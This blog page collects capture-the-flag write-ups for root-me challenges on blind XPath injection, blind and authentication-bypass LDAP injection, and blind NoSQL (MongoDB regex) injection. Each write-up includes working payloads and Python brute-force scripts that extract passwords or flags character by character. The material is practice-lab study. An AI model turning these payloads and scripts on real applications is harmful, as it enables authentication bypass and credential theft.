Protected: MeepwnCTF2018 – Map lờ

This content is password protected. To view it please enter your password below:

Advertisements

[root-me] XPath injection – blind

Statement

You’ve to retrieve the administrator password.


http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=1′

=> XPath error: //user[userid=1\’]  : single quotes and many special characters were escaped

it means I can’t use a string with quotes directly to find password value so I will use substring compare to substring, but we have to find password length first.

http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=111111 ] | //user[1][userid=1 and string-length(/user[2]/password)>1 ]| //user[userid=2
=> keep searching until it returns Steve, if false, it returns John

The most important thing is we can not use quotes character to send a string to the query so we can use the string from username, email, account type column in members table.

Here is example, I cut a char from username to compare to a char cut from password.

http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=111111 ] | //user[1][userid=1 and substring(//user[2]/password,2,1)=substring(//user[1]/username,3,1) ]| //user[userid=111111

if true, it will return John’s profile whereas it returns ERROR

here my code, you need to change username to email and account for char brute-force and so on…


import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import string
def requests_retry_session(
retries=10,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
session=None
):
session = session or requests.Session()
retry = Retry(
total=retries,
read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
""" searching for letters in password"""
url = "http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=111111] | //user[1][userid=1 and substring(//user[2]/password,"
payload0 = ",1)=substring(//user["
payload1 = "]/username,"
payload2 = ",1) ] | //user[userid=111111"
for u in range(1,14):
for user in range(1,6):
for i in range(1,18):
#print url+str(u)+payload0+str(user)+payload1+str(i)+payload2 """ turn it on if you want to track your url """
r=requests_retry_session().get(url+str(u)+",1)=substring(//user["+str(user)+"]/username,"+str(i)+",1) ] | //user[userid=111111")
if "Steve" in r.content:
print "pass char "+str(u)+" equal to username: "+str(user)+" pos: "+str(i)
break

for u in range(1,14):
for i in range(0,10):
#print url+str(u)+",1)="+str(i)+"] | //user[userid=11111"
r=requests_retry_session().get(url+str(u)+",1)="+str(i)+"] | //user[userid=111111")
if "Steve" in r.content:
print "pass char "+str(u)+" equal to number: "+str(i)
break

and you will get output like this
Screen Shot 2018-01-07 at 7.14.07 AM.png

now, it is your turn :))

Hello guys, my next semester is coming and I really need your help for my tuition fee
just 1 dollar and you will help me alot, thank you very much!
https://paypal.me/taind

[root-me]LDAP injection – blind

Hello guys, next semester is coming and I still can’t save enough money for my tuition fee, just 1 dollar and you will help me a lot, thank you!
If you have any questions abt this challenge, please do not hesitate to ask me
https://paypal.me/taind
:))

Statement

Retrieve administrator’s password.


This challenge is very easy, I do not have anything to say because everything you need for this challenge was in the document included. Please read the 5.3.2 section carefully and try again before scroll down!

Screen Shot 2018-01-03 at 2.56.09 AM.png

The point is you need to know what variable receive value from search parameter,

and I found that was EMAIL

 

Screen Shot 2018-01-03 at 2.51.12 AM.png

and I figured that there is a password variable

Screen Shot 2018-01-03 at 2.52.39 AM

and from 5.3.2 section, I wrote this script


import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import string
def requests_retry_session(
retries=10,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
session=None
):
session = session or requests.Session()
retry = Retry(
total=retries,

read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
""" hihi """
char=string.letters+string.digits+"_@"
url="http://challenge01.root-me.org/web-serveur/ch26/?action=dir&search=admin@ch26*)(password="
flag=""
for i in range(1,33):
for x in char:
print url+flag+x+"*))%00"
r=requests_retry_session().get(url+flag+x+"*))%00")
if "admin" in r.content:
flag+=x
break
print flag

Good luck, have fun!

 

 

[root-me] LDAP injection – authentication

Statement

Bypass authentication mechanism.


input: username=*)&password=111

ERROR : Invalid LDAP syntax : (&(uid=*))(userPassword=111))

(we know query structure)

input: username=*)(%26&password=111

which will become (&(uid=*)(&)(userPassword=111))

but the output is : unknown identifiers … which means my input has no error but i need to add more things …

Please read 4.2.1 section from their document !!!

(|(type=Rsc1)(type=Rsc2))

If the attacker enters Rsc1=printer)(uid=*), the following query is sent to the server:
(|(type=printer)(uid=*))(type=scanner))
The LDAP server responds with all the printer and user objects.
So this is my payload:

input: username=*)(|(userPassword=*&password=1)

which will become (&(uid=*)(|(userPassword=*)(userPassword=1)))

Screen Shot 2018-01-03 at 1.03.33 AM

 

 

[root-me]NoSQL injection – blind

Statement

This is a little web application to test challenge flags. Retrieve the flag for the challenge ’nosqlblind’.


I wasted my time for this challenge … because of “#” character … I don’t think It is the comment character in mongodb until…

please read this document, It will help you alot

https://docs.mongodb.com/manual/reference/operator/query/regex/

yeah, regex is love regex is life …

My thanks to Peter, whose document help me to fix this problem (I don’t know him LOL)

 Max retries exceeded with url ….. (Caused by NewConnectionError(‘<requests.packages.urllib3.connec)’

https://www.peterbe.com/plog/best-practice-with-retries-with-requests

Please read my code carefully (plus Peter), do not copy and paste


import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import string
def requests_retry_session(
retries=10,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
session=None
):
session = session or requests.Session()
retry = Retry(
total=retries,
read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session

url="http://challenge01.root-me.org/web-serveur/ch48/index.php?chall_name=nosqlblind&flag[$regex]="
char=string.letters+string.digits+"_!@$&" """ # is comment character """
flag=""
for x in range(1,33):
for i in char:
print url+"^"+flag+i """ ^ is start with """
r=requests_retry_session().get(url+"^"+flag+i)
if "Yeah" in r.content:
flag=flag+i
break
print flag

Hello guys…Next semester is coming I still can’t save enough money for my college tuition fee @@! Just 1 dollar and you will help me a lot https://www.paypal.me/taind